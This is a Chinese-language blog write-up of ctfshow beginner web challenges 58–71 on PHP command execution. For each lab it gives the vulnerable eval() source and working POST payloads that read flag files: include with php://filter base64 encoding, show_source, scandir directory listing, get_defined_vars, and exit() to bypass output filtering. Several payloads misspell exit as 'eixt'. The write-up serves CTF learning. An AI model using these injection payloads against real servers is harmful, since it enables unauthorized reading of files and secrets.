ctfshow-web入门-命令执行-58-71


web58

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

发现没有过滤,但是禁用了很多函数,phpinfo(),system()等都被禁用了,但是尝试过后可以使用

1·payloadc=copy('flag.php','1.txt');

2·payloadc=show_source('flag.php');

3·payload c=echo file_get_contents('flag.php');

4·include函数,下一题有payload

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=copy('flag.php','1.txt');

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=copy('flag.php','1.txt');

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

4.payloadc=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=include('flag.php');echo $flag;

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

4.payloadc=highlight_file('flag.php');

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=include('flag.php');echo $flag;

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

4.payloadc=highlight_file('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=include('flag.php');echo $flag;

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

4.payloadc=highlight_file('flag.php');

5.c=include(‘flag.php’);var_dump(get_defined_vars());

web64-65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1·payloadc=include('flag.php');echo $flag;

2·payloadc=show_source('flag.php');

3·payloadc=include('php://filter/convert.base64-encode/resource=flag.php');,然后base64解码

4.payloadc=highlight_file('flag.php');

5.payloadc=include('flag.php');var_dump(get_defined_vars());

web66-67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="秀秀得了,这次不在这里";

这次多禁用了一个show_source();但是其他四种不影响,我们输入以后发现不是flag,猜测在别的目录

c=print_r(scandir('.'));查看目录,发现没有多余的,于是查看根目录

Array
(
    [0] => .
    [1] => ..
    [2] => .dockerenv
    [3] => bin
    [4] => dev
    [5] => etc
    [6] => flag.txt
    [7] => home
    [8] => lib
    [9] => media
    [10] => mnt
    [11] => opt
    [12] => proc
    [13] => root
    [14] => run
    [15] => sbin
    [16] => srv
    [17] => sys
    [18] => tmp
    [19] => usr
    [20] => var
)

找到flag.txt,在和之前一样

1·payloadc=include('/flag.txt');echo $flag;

2·payloadc=include('php://filter/convert.base64-encode/resource=/flag.txt');,然后base64解码

3.payloadc=highlight_file('/flag.txt');

4.payloadc=include('/flag.txt');var_dump(get_defined_vars());

web68-70

打开一看就是

Parse error: syntax error, unexpected end of file in /var/www/html/index.php(17) : eval()'d code on line 1

根据之前的网页,应该适合之前一样。然后print_r()也被禁用了,我们尝试使用var_dump来试试。

array(21) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(10) ".dockerenv"
  [3]=>
  string(3) "bin"
  [4]=>
  string(3) "dev"
  [5]=>
  string(3) "etc"
  [6]=>
  string(8) "flag.txt"
  [7]=>
  string(4) "home"
  [8]=>
  string(3) "lib"
  [9]=>
  string(5) "media"
  [10]=>
  string(3) "mnt"
  [11]=>
  string(3) "opt"
  [12]=>
  string(4) "proc"
  [13]=>
  string(4) "root"
  [14]=>
  string(3) "run"
  [15]=>
  string(4) "sbin"
  [16]=>
  string(3) "srv"
  [17]=>
  string(3) "sys"
  [18]=>
  string(3) "tmp"
  [19]=>
  string(3) "usr"
  [20]=>
  string(3) "var"
}

1·payloadc=include('/flag.txt');echo $flag;

2·payloadc=include('php://filter/convert.base64-encode/resource=/flag.txt');,然后base64解码

3.payloadc=include('/flag.txt');var_dump(get_defined_vars());

web71

打开以后只有

Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14

Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24
你要上天吗?

附件源代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗?

同上,只不过要是脚本跑一下目录,然后结束时加一个exit();

跑目录的Payloadc=for($i=0;$i<=40;$i%2B%2B){echo scandir('/')[$i].'<br>';}exit();

1·payloadc=include('/flag.txt');echo $flag;eixt();

2·payloadc=include('php://filter/convert.base64-encode/resource=/flag.txt');eixt();,然后base64解码

3.payloadc=include('/flag.txt');var_dump(get_defined_vars());eixt();


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录